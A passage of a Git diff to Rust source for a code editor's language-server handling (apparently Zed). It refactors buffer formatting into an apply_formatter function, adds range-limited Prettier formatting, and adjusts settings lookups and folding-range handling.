Some(requested.clone()) } } else { - supported + None }; Ok(lsp::CodeActionParams { @@ -2937,9 +2936,7 @@ impl LspCommand for OnTypeFormatting { .await?; let options = buffer.update(&mut cx, |buffer, cx| { - lsp_formatting_options( - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx).as_ref(), - ) + lsp_formatting_options(LanguageSettings::for_buffer(buffer, cx).as_ref()) }); Ok(Self { @@ -3218,8 +3215,9 @@ impl InlayHints { Some(((uri, range), server_id)) => Some(( LanguageServerId(server_id as usize), lsp::Location { - uri: lsp::Uri::from_str(&uri) - .context("invalid uri in hint part {part:?}")?, + uri: lsp::Uri::from_str(&uri).with_context(|| { + format!("invalid uri in hint part {uri:?}") + })?, range: lsp::Range::new( point_to_lsp(PointUtf16::new( range.start.row, @@ -4857,9 +4855,14 @@ impl LspCommand for GetFoldingRanges { self, message: proto::GetFoldingRangesResponse, _: Entity, - _: Entity, - _: AsyncApp, + buffer: Entity, + mut cx: AsyncApp, ) -> Result { + buffer + .update(&mut cx, |buffer, _| { + buffer.wait_for_version(deserialize_version(&message.version)) + }) + .await?; message .ranges .into_iter() diff --git a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index ad3d4bdb703548f86304ac6c3892f3cabab01caa..2f579f5a724db143bbd4b0f9853a217bd6b14655 100644 --- a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -71,15 +71,14 @@ use http_client::HttpClient; use itertools::Itertools as _; use language::{ Bias, BinaryStatus, Buffer, BufferRow, BufferSnapshot, CachedLspAdapter, Capability, CodeLabel, - Diagnostic, DiagnosticEntry, DiagnosticSet, DiagnosticSourceKind, Diff, File as _, Language, - LanguageName, LanguageRegistry, LocalFile, LspAdapter, LspAdapterDelegate, LspInstaller, - ManifestDelegate, ManifestName, Patch, PointUtf16, TextBufferSnapshot, ToOffset, ToPointUtf16, - Toolchain, Transaction, Unclipped, + CodeLabelExt, Diagnostic, DiagnosticEntry, DiagnosticSet, DiagnosticSourceKind, Diff, + File as _, Language, LanguageName, LanguageRegistry, LocalFile, LspAdapter, LspAdapterDelegate, + LspInstaller, ManifestDelegate, ManifestName, ModelineSettings, OffsetUtf16, Patch, PointUtf16, + TextBufferSnapshot, ToOffset, ToOffsetUtf16, ToPointUtf16, Toolchain, Transaction, Unclipped, language_settings::{ AllLanguageSettings, FormatOnSave, Formatter, LanguageSettings, all_language_settings, - language_settings, }, - point_to_lsp, + modeline, point_to_lsp, proto::{ deserialize_anchor, deserialize_anchor_range, deserialize_version, serialize_anchor, serialize_anchor_range, serialize_version, @@ -150,6 +149,8 @@ pub use language::Location; pub use lsp_store::inlay_hints::{CacheInlayHints, InvalidationStrategy}; #[cfg(any(test, feature = "test-support"))] pub use prettier::FORMAT_SUFFIX as TEST_PRETTIER_FORMAT_SUFFIX; +#[cfg(any(test, feature = "test-support"))] +pub use prettier::RANGE_FORMAT_SUFFIX as TEST_PRETTIER_RANGE_FORMAT_SUFFIX; pub use semantic_tokens::{ BufferSemanticToken, BufferSemanticTokens, RefreshForServer, SemanticTokenStylizer, TokenType, }; @@ -548,6 +549,7 @@ impl LocalLspStore { let mut initialization_options = Self::initialization_options_for_adapter( adapter.adapter.clone(), &delegate, + cx, ) .await?; @@ -822,15 +824,7 @@ impl LocalLspStore { let adapter = adapter.clone(); if let Some(this) = this.upgrade() { this.update(cx, |this, cx| { - { - let buffer = params - .uri - .to_file_path() - .map(|file_path| this.get_buffer(&file_path, cx)) - .ok() - .flatten(); - adapter.process_diagnostics(&mut params, server_id, buffer); - } + adapter.process_diagnostics(&mut params, server_id); this.merge_lsp_diagnostics( DiagnosticSourceKind::Pushed, @@ -843,9 +837,9 @@ impl LocalLspStore { ), registration_id: None, }], - |_, diagnostic, cx| match diagnostic.source_kind { + |_, diagnostic, _cx| match diagnostic.source_kind { DiagnosticSourceKind::Other | DiagnosticSourceKind::Pushed => { - adapter.retain_old_diagnostic(diagnostic, cx) + adapter.retain_old_diagnostic(diagnostic) } DiagnosticSourceKind::Pulled => true, }, @@ -1600,9 +1594,7 @@ impl LocalLspStore { .language_servers_for_buffer(buffer, cx) .map(|(adapter, lsp)| (adapter.clone(), lsp.clone())) .collect::>(); - let settings = - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx) - .into_owned(); + let settings = LanguageSettings::for_buffer(buffer, cx).into_owned(); let request_timeout = ProjectSettings::get_global(cx) .global_lsp_settings .get_request_timeout(); @@ -1610,28 +1602,6 @@ impl LocalLspStore { }) })?; - /// Apply edits to the buffer that will become part of the formatting transaction. - /// Fails if the buffer has been edited since the start of that transaction. - fn extend_formatting_transaction( - buffer: &FormattableBuffer, - formatting_transaction_id: text::TransactionId, - cx: &mut AsyncApp, - operation: impl FnOnce(&mut Buffer, &mut Context), - ) -> anyhow::Result<()> { - buffer.handle.update(cx, |buffer, cx| { - let last_transaction_id = buffer.peek_undo_stack().map(|t| t.transaction_id()); - if last_transaction_id != Some(formatting_transaction_id) { - anyhow::bail!("Buffer edited while formatting. Aborting") - } - buffer.start_transaction(); - operation(buffer, cx); - if let Some(transaction_id) = buffer.end_transaction(cx) { - buffer.merge_transactions(transaction_id, formatting_transaction_id); - } - Ok(()) - }) - } - // handle whitespace formatting if settings.remove_trailing_whitespace_on_save { zlog::trace!(logger => "removing trailing whitespace"); @@ -1701,503 +1671,585 @@ impl LocalLspStore { } else { formatter }; - match formatter { - Formatter::Auto => unreachable!("Auto resolved above"), - Formatter::Prettier => { - let logger = zlog::scoped!(logger => "prettier"); - zlog::trace!(logger => "formatting"); - let _timer = zlog::time!(logger => "Formatting buffer via prettier"); - - let prettier = lsp_store.read_with(cx, |lsp_store, _cx| { - lsp_store.prettier_store().unwrap().downgrade() - })?; - let diff = prettier_store::format_with_prettier(&prettier, &buffer.handle, cx) - .await - .transpose()?; - let Some(diff) = diff else { - zlog::trace!(logger => "No changes"); - continue; - }; + if let Err(err) = Self::apply_formatter( + formatter, + &lsp_store, + buffer, + formatting_transaction_id, + &adapters_and_servers, + &settings, + request_timeout, + logger, + cx, + ) + .await + { + zlog::error!(logger => "Formatter failed, skipping: {err:#}"); + } + } - extend_formatting_transaction( - buffer, - formatting_transaction_id, - cx, - |buffer, cx| { - buffer.apply_diff(diff, cx); - }, - )?; + Ok(()) + } + + async fn apply_formatter( + formatter: &Formatter, + lsp_store: &WeakEntity, + buffer: &FormattableBuffer, + formatting_transaction_id: clock::Lamport, + adapters_and_servers: &[(Arc, Arc)], + settings: &LanguageSettings, + request_timeout: Duration, + logger: zlog::Logger, + cx: &mut AsyncApp, + ) -> anyhow::Result<()> { + match formatter { + Formatter::None => { + zlog::trace!(logger => "skipping formatter 'none'"); + return Ok(()); + } + Formatter::Auto => { + debug_panic!("Auto resolved above"); + return Ok(()); + } + Formatter::Prettier => { + let logger = zlog::scoped!(logger => "prettier"); + zlog::trace!(logger => "formatting"); + let _timer = zlog::time!(logger => "Formatting buffer via prettier"); + + // When selection ranges are provided (via FormatSelections), we pass the + // encompassing UTF-16 range to Prettier so it can scope its formatting. + // After diffing, we filter the resulting edits to only keep those that + // overlap with the original byte-level selection ranges. + let (range_utf16, byte_ranges) = match buffer.ranges.as_ref() { + Some(ranges) if !ranges.is_empty() => { + let (utf16_range, byte_ranges) = + buffer.handle.read_with(cx, |buffer, _cx| { + let snapshot = buffer.snapshot(); + let mut min_start_utf16 = OffsetUtf16(usize::MAX); + let mut max_end_utf16 = OffsetUtf16(0); + let mut byte_ranges = Vec::with_capacity(ranges.len()); + for range in ranges { + let start_utf16 = range.start.to_offset_utf16(&snapshot); + let end_utf16 = range.end.to_offset_utf16(&snapshot); + min_start_utf16.0 = min_start_utf16.0.min(start_utf16.0); + max_end_utf16.0 = max_end_utf16.0.max(end_utf16.0); + + let start_byte = range.start.to_offset(&snapshot); + let end_byte = range.end.to_offset(&snapshot); + byte_ranges.push(start_byte..end_byte); + } + (min_start_utf16..max_end_utf16, byte_ranges) + }); + (Some(utf16_range), Some(byte_ranges)) + } + _ => (None, None), + }; + + let prettier = lsp_store.read_with(cx, |lsp_store, _cx| { + lsp_store.prettier_store().unwrap().downgrade() + })?; + let diff = prettier_store::format_with_prettier( + &prettier, + &buffer.handle, + range_utf16, + cx, + ) + .await + .transpose()?; + let Some(mut diff) = diff else { + zlog::trace!(logger => "No changes"); + return Ok(()); + }; + + if let Some(byte_ranges) = byte_ranges { + diff.edits.retain(|(edit_range, _)| { + byte_ranges.iter().any(|selection_range| { + edit_range.start < selection_range.end + && edit_range.end > selection_range.start + }) + }); + if diff.edits.is_empty() { + zlog::trace!(logger => "No changes within selection"); + return Ok(()); + } } - Formatter::External { command, arguments } => { - let logger = zlog::scoped!(logger => "command"); - zlog::trace!(logger => "formatting"); - let _timer = zlog::time!(logger => "Formatting buffer via external command"); - let diff = Self::format_via_external_command( - buffer, - &command, - arguments.as_deref(), + extend_formatting_transaction( + buffer, + formatting_transaction_id, + cx, + |buffer, cx| { + buffer.apply_diff(diff, cx); + }, + )?; + } + Formatter::External { command, arguments } => { + let logger = zlog::scoped!(logger => "command"); + + if buffer.ranges.is_some() { + zlog::debug!(logger => "External formatter does not support range formatting; skipping"); + return Ok(()); + } + + zlog::trace!(logger => "formatting"); + let _timer = zlog::time!(logger => "Formatting buffer via external command"); + + let diff = + Self::format_via_external_command(buffer, &command, arguments.as_deref(), cx) + .await + .with_context(|| { + format!("Failed to format buffer via external command: {}", command) + })?; + let Some(diff) = diff else { + zlog::trace!(logger => "No changes"); + return Ok(()); + }; + + extend_formatting_transaction( + buffer, + formatting_transaction_id, + cx, + |buffer, cx| { + buffer.apply_diff(diff, cx); + }, + )?; + } + Formatter::LanguageServer(specifier) => { + let logger = zlog::scoped!(logger => "language-server"); + zlog::trace!(logger => "formatting"); + let _timer = zlog::time!(logger => "Formatting buffer using language server"); + + let Some(buffer_path_abs) = buffer.abs_path.as_ref() else { + zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using language servers. Skipping"); + return Ok(()); + }; + + let language_server = match specifier { + settings::LanguageServerFormatterSpecifier::Specific { name } => { + adapters_and_servers.iter().find_map(|(adapter, server)| { + if adapter.name.0.as_ref() == name { + Some(server.clone()) + } else { + None + } + }) + } + settings::LanguageServerFormatterSpecifier::Current => adapters_and_servers + .iter() + .find(|(_, server)| Self::server_supports_formatting(server)) + .map(|(_, server)| server.clone()), + }; + + let Some(language_server) = language_server else { + log::debug!( + "No language server found to format buffer '{:?}'. Skipping", + buffer_path_abs.as_path().to_string_lossy() + ); + return Ok(()); + }; + + zlog::trace!( + logger => + "Formatting buffer '{:?}' using language server '{:?}'", + buffer_path_abs.as_path().to_string_lossy(), + language_server.name() + ); + + let edits = if let Some(ranges) = buffer.ranges.as_ref() { + zlog::trace!(logger => "formatting ranges"); + Self::format_ranges_via_lsp( + &lsp_store, + &buffer.handle, + ranges, + buffer_path_abs, + &language_server, + &settings, cx, ) .await - .with_context(|| { - format!("Failed to format buffer via external command: {}", command) - })?; - let Some(diff) = diff else { - zlog::trace!(logger => "No changes"); - continue; - }; - - extend_formatting_transaction( - buffer, - formatting_transaction_id, + .context("Failed to format ranges via language server")? + } else { + zlog::trace!(logger => "formatting full"); + Self::format_via_lsp( + &lsp_store, + &buffer.handle, + buffer_path_abs, + &language_server, + &settings, cx, - |buffer, cx| { - buffer.apply_diff(diff, cx); - }, - )?; + ) + .await + .context("failed to format via language server")? + }; + + if edits.is_empty() { + zlog::trace!(logger => "No changes"); + return Ok(()); } - Formatter::LanguageServer(specifier) => { - let logger = zlog::scoped!(logger => "language-server"); - zlog::trace!(logger => "formatting"); - let _timer = zlog::time!(logger => "Formatting buffer using language server"); + extend_formatting_transaction( + buffer, + formatting_transaction_id, + cx, + |buffer, cx| { + buffer.edit(edits, None, cx); + }, + )?; + } + Formatter::CodeAction(code_action_name) => { + let logger = zlog::scoped!(logger => "code-actions"); + zlog::trace!(logger => "formatting"); + let _timer = zlog::time!(logger => "Formatting buffer using code actions"); - let Some(buffer_path_abs) = buffer.abs_path.as_ref() else { - zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using language servers. Skipping"); - continue; - }; + let Some(buffer_path_abs) = buffer.abs_path.as_ref() else { + zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using code actions. Skipping"); + return Ok(()); + }; - let language_server = match specifier { - settings::LanguageServerFormatterSpecifier::Specific { name } => { - adapters_and_servers.iter().find_map(|(adapter, server)| { - if adapter.name.0.as_ref() == name { - Some(server.clone()) - } else { - None - } - }) - } - settings::LanguageServerFormatterSpecifier::Current => { - adapters_and_servers.first().map(|e| e.1.clone()) - } - }; + let code_action_kind: CodeActionKind = code_action_name.clone().into(); + zlog::trace!(logger => "Attempting to resolve code actions {:?}", &code_action_kind); - let Some(language_server) = language_server else { - log::debug!( - "No language server found to format buffer '{:?}'. Skipping", - buffer_path_abs.as_path().to_string_lossy() + let mut actions_and_servers = Vec::new(); + + for (index, (_, language_server)) in adapters_and_servers.iter().enumerate() { + let actions_result = Self::get_server_code_actions_from_action_kinds( + &lsp_store, + language_server.server_id(), + vec![code_action_kind.clone()], + &buffer.handle, + cx, + ) + .await + .with_context(|| { + format!( + "Failed to resolve code action {:?} with language server {}", + code_action_kind, + language_server.name() + ) + }); + let Ok(actions) = actions_result else { + // note: it may be better to set result to the error and break formatters here + // but for now we try to execute the actions that we can resolve and skip the rest + zlog::error!( + logger => + "Failed to resolve code action {:?} with language server {}", + code_action_kind, + language_server.name() ); continue; }; + for action in actions { + actions_and_servers.push((action, index)); + } + } - zlog::trace!( - logger => - "Formatting buffer '{:?}' using language server '{:?}'", - buffer_path_abs.as_path().to_string_lossy(), - language_server.name() - ); + if actions_and_servers.is_empty() { + zlog::warn!(logger => "No code actions were resolved, continuing"); + return Ok(()); + } - let edits = if let Some(ranges) = buffer.ranges.as_ref() { - zlog::trace!(logger => "formatting ranges"); - Self::format_ranges_via_lsp( - &lsp_store, - &buffer.handle, - ranges, - buffer_path_abs, - &language_server, - &settings, - cx, - ) - .await - .context("Failed to format ranges via language server")? - } else { - zlog::trace!(logger => "formatting full"); - Self::format_via_lsp( - &lsp_store, - &buffer.handle, - buffer_path_abs, - &language_server, - &settings, - cx, + 'actions: for (mut action, server_index) in actions_and_servers { + let server = &adapters_and_servers[server_index].1; + + let describe_code_action = |action: &CodeAction| { + format!( + "code action '{}' with title \"{}\" on server {}", + action + .lsp_action + .action_kind() + .unwrap_or("unknown".into()) + .as_str(), + action.lsp_action.title(), + server.name(), ) - .await - .context("failed to format via language server")? }; - if edits.is_empty() { - zlog::trace!(logger => "No changes"); - continue; - } - extend_formatting_transaction( - buffer, - formatting_transaction_id, - cx, - |buffer, cx| { - buffer.edit(edits, None, cx); - }, - )?; - } - Formatter::CodeAction(code_action_name) => { - let logger = zlog::scoped!(logger => "code-actions"); - zlog::trace!(logger => "formatting"); - let _timer = zlog::time!(logger => "Formatting buffer using code actions"); + zlog::trace!(logger => "Executing {}", describe_code_action(&action)); - let Some(buffer_path_abs) = buffer.abs_path.as_ref() else { - zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using code actions. Skipping"); + if let Err(err) = + Self::try_resolve_code_action(server, &mut action, request_timeout).await + { + zlog::error!( + logger => + "Failed to resolve {}. Error: {}", + describe_code_action(&action), + err + ); continue; - }; - - let code_action_kind: CodeActionKind = code_action_name.clone().into(); - zlog::trace!(logger => "Attempting to resolve code actions {:?}", &code_action_kind); - - let mut actions_and_servers = Vec::new(); + } - for (index, (_, language_server)) in adapters_and_servers.iter().enumerate() { - let actions_result = Self::get_server_code_actions_from_action_kinds( - &lsp_store, - language_server.server_id(), - vec![code_action_kind.clone()], - &buffer.handle, - cx, - ) - .await - .with_context(|| { - format!( - "Failed to resolve code action {:?} with language server {}", - code_action_kind, - language_server.name() - ) - }); - let Ok(actions) = actions_result else { - // note: it may be better to set result to the error and break formatters here - // but for now we try to execute the actions that we can resolve and skip the rest - zlog::error!( + if let Some(edit) = action.lsp_action.edit().cloned() { + // NOTE: code below duplicated from `Self::deserialize_workspace_edit` + // but filters out and logs warnings for code actions that require unreasonably + // difficult handling on our part, such as: + // - applying edits that call commands + // which can result in arbitrary workspace edits being sent from the server that + // have no way of being tied back to the command that initiated them (i.e. we + // can't know which edits are part of the format request, or if the server is done sending + // actions in response to the command) + // - actions that create/delete/modify/rename files other than the one we are formatting + // as we then would need to handle such changes correctly in the local history as well + // as the remote history through the ProjectTransaction + // - actions with snippet edits, as these simply don't make sense in the context of a format request + // Supporting these actions is not impossible, but not supported as of yet. + if edit.changes.is_none() && edit.document_changes.is_none() { + zlog::trace!( logger => - "Failed to resolve code action {:?} with language server {}", - code_action_kind, - language_server.name() + "No changes for code action. Skipping {}", + describe_code_action(&action), ); continue; - }; - for action in actions { - actions_and_servers.push((action, index)); } - } - if actions_and_servers.is_empty() { - zlog::warn!(logger => "No code actions were resolved, continuing"); - continue; - } - - 'actions: for (mut action, server_index) in actions_and_servers { - let server = &adapters_and_servers[server_index].1; - - let describe_code_action = |action: &CodeAction| { - format!( - "code action '{}' with title \"{}\" on server {}", - action - .lsp_action - .action_kind() - .unwrap_or("unknown".into()) - .as_str(), - action.lsp_action.title(), - server.name(), - ) - }; + let mut operations = Vec::new(); + if let Some(document_changes) = edit.document_changes { + match document_changes { + lsp::DocumentChanges::Edits(edits) => operations.extend( + edits.into_iter().map(lsp::DocumentChangeOperation::Edit), + ), + lsp::DocumentChanges::Operations(ops) => operations = ops, + } + } else if let Some(changes) = edit.changes { + operations.extend(changes.into_iter().map(|(uri, edits)| { + lsp::DocumentChangeOperation::Edit(lsp::TextDocumentEdit { + text_document: lsp::OptionalVersionedTextDocumentIdentifier { + uri, + version: None, + }, + edits: edits.into_iter().map(Edit::Plain).collect(), + }) + })); + } - zlog::trace!(logger => "Executing {}", describe_code_action(&action)); + let mut edits = Vec::with_capacity(operations.len()); - if let Err(err) = - Self::try_resolve_code_action(server, &mut action, request_timeout) - .await - { - zlog::error!( + if operations.is_empty() { + zlog::trace!( logger => - "Failed to resolve {}. Error: {}", + "No changes for code action. Skipping {}", describe_code_action(&action), - err ); continue; } - - if let Some(edit) = action.lsp_action.edit().cloned() { - // NOTE: code below duplicated from `Self::deserialize_workspace_edit` - // but filters out and logs warnings for code actions that require unreasonably - // difficult handling on our part, such as: - // - applying edits that call commands - // which can result in arbitrary workspace edits being sent from the server that - // have no way of being tied back to the command that initiated them (i.e. we - // can't know which edits are part of the format request, or if the server is done sending - // actions in response to the command) - // - actions that create/delete/modify/rename files other than the one we are formatting - // as we then would need to handle such changes correctly in the local history as well - // as the remote history through the ProjectTransaction - // - actions with snippet edits, as these simply don't make sense in the context of a format request - // Supporting these actions is not impossible, but not supported as of yet. - if edit.changes.is_none() && edit.document_changes.is_none() { - zlog::trace!( + for operation in operations { + let op = match operation { + lsp::DocumentChangeOperation::Edit(op) => op, + lsp::DocumentChangeOperation::Op(_) => { + zlog::warn!( + logger => + "Code actions which create, delete, or rename files are not supported on format. Skipping {}", + describe_code_action(&action), + ); + continue 'actions; + } + }; + let Ok(file_path) = op.text_document.uri.to_file_path() else { + zlog::warn!( logger => - "No changes for code action. Skipping {}", + "Failed to convert URI '{:?}' to file path. Skipping {}", + &op.text_document.uri, describe_code_action(&action), ); - continue; - } - - let mut operations = Vec::new(); - if let Some(document_changes) = edit.document_changes { - match document_changes { - lsp::DocumentChanges::Edits(edits) => operations.extend( - edits.into_iter().map(lsp::DocumentChangeOperation::Edit), - ), - lsp::DocumentChanges::Operations(ops) => operations = ops, - } - } else if let Some(changes) = edit.changes { - operations.extend(changes.into_iter().map(|(uri, edits)| { - lsp::DocumentChangeOperation::Edit(lsp::TextDocumentEdit { - text_document: - lsp::OptionalVersionedTextDocumentIdentifier { - uri, - version: None, - }, - edits: edits.into_iter().map(Edit::Plain).collect(), - }) - })); - } - - let mut edits = Vec::with_capacity(operations.len()); - - if operations.is_empty() { - zlog::trace!( + continue 'actions; + }; + if &file_path != buffer_path_abs { + zlog::warn!( logger => - "No changes for code action. Skipping {}", + "File path '{:?}' does not match buffer path '{:?}'. Skipping {}", + file_path, + buffer_path_abs, describe_code_action(&action), ); - continue; + continue 'actions; } - for operation in operations { - let op = match operation { - lsp::DocumentChangeOperation::Edit(op) => op, - lsp::DocumentChangeOperation::Op(_) => { + + let mut lsp_edits = Vec::new(); + for edit in op.edits { + match edit { + Edit::Plain(edit) => { + if !lsp_edits.contains(&edit) { + lsp_edits.push(edit); + } + } + Edit::Annotated(edit) => { + if !lsp_edits.contains(&edit.text_edit) { + lsp_edits.push(edit.text_edit); + } + } + Edit::Snippet(_) => { zlog::warn!( logger => - "Code actions which create, delete, or rename files are not supported on format. Skipping {}", + "Code actions which produce snippet edits are not supported during formatting. Skipping {}", describe_code_action(&action), ); continue 'actions; } - }; - let Ok(file_path) = op.text_document.uri.to_file_path() else { - zlog::warn!( - logger => - "Failed to convert URI '{:?}' to file path. Skipping {}", - &op.text_document.uri, - describe_code_action(&action), - ); - continue 'actions; - }; - if &file_path != buffer_path_abs { - zlog::warn!( - logger => - "File path '{:?}' does not match buffer path '{:?}'. Skipping {}", - file_path, - buffer_path_abs, - describe_code_action(&action), - ); - continue 'actions; - } - - let mut lsp_edits = Vec::new(); - for edit in op.edits { - match edit { - Edit::Plain(edit) => { - if !lsp_edits.contains(&edit) { - lsp_edits.push(edit); - } - } - Edit::Annotated(edit) => { - if !lsp_edits.contains(&edit.text_edit) { - lsp_edits.push(edit.text_edit); - } - } - Edit::Snippet(_) => { - zlog::warn!( - logger => - "Code actions which produce snippet edits are not supported during formatting. Skipping {}", - describe_code_action(&action), - ); - continue 'actions; - } - } } - let edits_result = lsp_store - .update(cx, |lsp_store, cx| { - lsp_store.as_local_mut().unwrap().edits_from_lsp( - &buffer.handle, - lsp_edits, - server.server_id(), - op.text_document.version, - cx, - ) - })? - .await; - let Ok(resolved_edits) = edits_result else { - zlog::warn!( - logger => - "Failed to resolve edits from LSP for buffer {:?} while handling {}", - buffer_path_abs.as_path(), - describe_code_action(&action), - ); - continue 'actions; - }; - edits.extend(resolved_edits); - } - - if edits.is_empty() { - zlog::warn!(logger => "No edits resolved from LSP"); - continue; } - - extend_formatting_transaction( - buffer, - formatting_transaction_id, - cx, - |buffer, cx| { - zlog::info!( - "Applying edits {edits:?}. Content: {:?}", - buffer.text() - ); - buffer.edit(edits, None, cx); - zlog::info!("Applied edits. New Content: {:?}", buffer.text()); - }, - )?; + let edits_result = lsp_store + .update(cx, |lsp_store, cx| { + lsp_store.as_local_mut().unwrap().edits_from_lsp( + &buffer.handle, + lsp_edits, + server.server_id(), + op.text_document.version, + cx, + ) + })? + .await; + let Ok(resolved_edits) = edits_result else { + zlog::warn!( + logger => + "Failed to resolve edits from LSP for buffer {:?} while handling {}", + buffer_path_abs.as_path(), + describe_code_action(&action), + ); + continue 'actions; + }; + edits.extend(resolved_edits); } - // bail early if command is invalid - let Some(command) = action.lsp_action.command() else { - continue; - }; - - zlog::warn!( - logger => - "Executing code action command '{}'. This may cause formatting to abort unnecessarily as well as splitting formatting into two entries in the undo history", - &command.command, - ); - - let server_capabilities = server.capabilities(); - let available_commands = server_capabilities - .execute_command_provider - .as_ref() - .map(|options| options.commands.as_slice()) - .unwrap_or_default(); - if !available_commands.contains(&command.command) { - zlog::warn!( - logger => - "Cannot execute a command {} not listed in the language server capabilities of server {}", - command.command, - server.name(), - ); + if edits.is_empty() { + zlog::warn!(logger => "No edits resolved from LSP"); continue; } - // noop so we just ensure buffer hasn't been edited since resolving code actions extend_formatting_transaction( buffer, formatting_transaction_id, cx, - |_, _| {}, + |buffer, cx| { + zlog::info!( + "Applying edits {edits:?}. Content: {:?}", + buffer.text() + ); + buffer.edit(edits, None, cx); + zlog::info!("Applied edits. New Content: {:?}", buffer.text()); + }, )?; - zlog::info!(logger => "Executing command {}", &command.command); + } - lsp_store.update(cx, |this, _| { - this.as_local_mut() - .unwrap() - .last_workspace_edits_by_language_server - .remove(&server.server_id()); - })?; + let Some(command) = action.lsp_action.command() else { + continue; + }; - let execute_command_result = server - .request::( - lsp::ExecuteCommandParams { - command: command.command.clone(), - arguments: command.arguments.clone().unwrap_or_default(), - ..Default::default() - }, - request_timeout, - ) - .await - .into_response(); + zlog::warn!( + logger => + "Executing code action command '{}'. This may cause formatting to abort unnecessarily as well as splitting formatting into two entries in the undo history", + &command.command, + ); - if execute_command_result.is_err() { - zlog::error!( - logger => - "Failed to execute command '{}' as part of {}", - &command.command, - describe_code_action(&action), - ); - continue 'actions; - } + let server_capabilities = server.capabilities(); + let available_commands = server_capabilities + .execute_command_provider + .as_ref() + .map(|options| options.commands.as_slice()) + .unwrap_or_default(); + if !available_commands.contains(&command.command) { + zlog::warn!( + logger => + "Cannot execute a command {} not listed in the language server capabilities of server {}", + command.command, + server.name(), + ); + continue; + } - let mut project_transaction_command = lsp_store.update(cx, |this, _| { - this.as_local_mut() - .unwrap() - .last_workspace_edits_by_language_server - .remove(&server.server_id()) - .unwrap_or_default() - })?; + extend_formatting_transaction( + buffer, + formatting_transaction_id, + cx, + |_, _| {}, + )?; + zlog::info!(logger => "Executing command {}", &command.command); - if let Some(transaction) = - project_transaction_command.0.remove(&buffer.handle) - { - zlog::trace!( - logger => - "Successfully captured {} edits that resulted from command {}", - transaction.edit_ids.len(), - &command.command, - ); - let transaction_id_project_transaction = transaction.id; - buffer.handle.update(cx, |buffer, _| { - // it may have been removed from history if push_to_history was - // false in deserialize_workspace_edit. If so push it so we - // can merge it with the format transaction - // and pop the combined transaction off the history stack - // later if push_to_history is false - if buffer.get_transaction(transaction.id).is_none() { - buffer.push_transaction(transaction, Instant::now()); - } - buffer.merge_transactions( - transaction_id_project_transaction, - formatting_transaction_id, - ); - }); - } + lsp_store.update(cx, |this, _| { + this.as_local_mut() + .unwrap() + .last_workspace_edits_by_language_server + .remove(&server.server_id()); + })?; - if project_transaction_command.0.is_empty() { - continue; - } + let execute_command_result = server + .request::( + lsp::ExecuteCommandParams { + command: command.command.clone(), + arguments: command.arguments.clone().unwrap_or_default(), + ..Default::default() + }, + request_timeout, + ) + .await + .into_response(); - let mut extra_buffers = String::new(); - for buffer in project_transaction_command.0.keys() { - buffer.read_with(cx, |b, cx| { - let Some(path) = b.project_path(cx) else { - return; - }; + if execute_command_result.is_err() { + zlog::error!( + logger => + "Failed to execute command '{}' as part of {}", + &command.command, + describe_code_action(&action), + ); + continue 'actions; + } - if !extra_buffers.is_empty() { - extra_buffers.push_str(", "); - } - extra_buffers.push_str(path.path.as_unix_str()); - }); - } - zlog::warn!( + let mut project_transaction_command = lsp_store.update(cx, |this, _| { + this.as_local_mut() + .unwrap() + .last_workspace_edits_by_language_server + .remove(&server.server_id()) + .unwrap_or_default() + })?; + + if let Some(transaction) = project_transaction_command.0.remove(&buffer.handle) + { + zlog::trace!( logger => - "Unexpected edits to buffers other than the buffer actively being formatted due to command {}. Impacted buffers: [{}].", + "Successfully captured {} edits that resulted from command {}", + transaction.edit_ids.len(), &command.command, - extra_buffers, ); - // NOTE: if this case is hit, the proper thing to do is to for each buffer, merge the extra transaction - // into the existing transaction in project_transaction if there is one, and if there isn't one in project_transaction, - // add it so it's included, and merge it into the format transaction when its created later + let transaction_id_project_transaction = transaction.id; + buffer.handle.update(cx, |buffer, _| { + // it may have been removed from history if push_to_history was + // false in deserialize_workspace_edit. If so push it so we + // can merge it with the format transaction + // and pop the combined transaction off the history stack + // later if push_to_history is false + if buffer.get_transaction(transaction.id).is_none() { + buffer.push_transaction(transaction, Instant::now()); + } + buffer.merge_transactions( + transaction_id_project_transaction, + formatting_transaction_id, + ); + }); + } + + if project_transaction_command.0.is_empty() { + continue; + } + + let mut extra_buffers = String::new(); + for buffer in project_transaction_command.0.keys() { + buffer.read_with(cx, |b, cx| { + let Some(path) = b.project_path(cx) else { + return; + }; + + if !extra_buffers.is_empty() { + extra_buffers.push_str(", "); + } + extra_buffers.push_str(path.path.as_unix_str()); + }); } + zlog::warn!( + logger => + "Unexpected edits to buffers other than the buffer actively being formatted due to command {}. Impacted buffers: [{}].", + &command.command, + extra_buffers, + ); + // NOTE: if this case is hit, the proper thing to do is to for each buffer, merge the extra transaction + // into the existing transaction in project_transaction if there is one, and if there isn't one in project_transaction, + // add it so it's included, and merge it into the format transaction when its created later } } } @@ -2284,6 +2336,14 @@ impl LocalLspStore { } } + fn server_supports_formatting(server: &Arc) -> bool { + let capabilities = server.capabilities(); + let formatting = capabilities.document_formatting_provider.as_ref(); + let range_formatting = capabilities.document_range_formatting_provider.as_ref(); + matches!(formatting, Some(p) if *p != OneOf::Left(false)) + || matches!(range_formatting, Some(p) if *p != OneOf::Left(false)) + } + async fn format_via_lsp( this: &WeakEntity, buffer: &Entity, @@ -3157,7 +3217,7 @@ impl LocalLspStore { .map(|edit| (range_from_lsp(edit.range), edit.new_text)) .collect::>(); - lsp_edits.sort_by_key(|(range, _)| (range.start, range.end)); + lsp_edits.sort_unstable_by_key(|(range, _)| (range.start, range.end)); let mut lsp_edits = lsp_edits.into_iter().peekable(); let mut edits = Vec::new(); @@ -3771,9 +3831,10 @@ impl LocalLspStore { async fn initialization_options_for_adapter( adapter: Arc, delegate: &Arc, + cx: &mut AsyncApp, ) -> Result> { let Some(mut initialization_config) = - adapter.clone().initialization_options(delegate).await? + adapter.clone().initialization_options(delegate, cx).await? else { return Ok(None); }; @@ -3903,6 +3964,7 @@ pub struct LspStore { pub lsp_server_capabilities: HashMap, semantic_token_config: SemanticTokenConfig, lsp_data: HashMap, + buffer_reload_tasks: HashMap>>, next_hint_id: Arc, } @@ -3952,10 +4014,7 @@ impl BufferLspData { self.inlay_hints.remove_server_data(for_server); if let 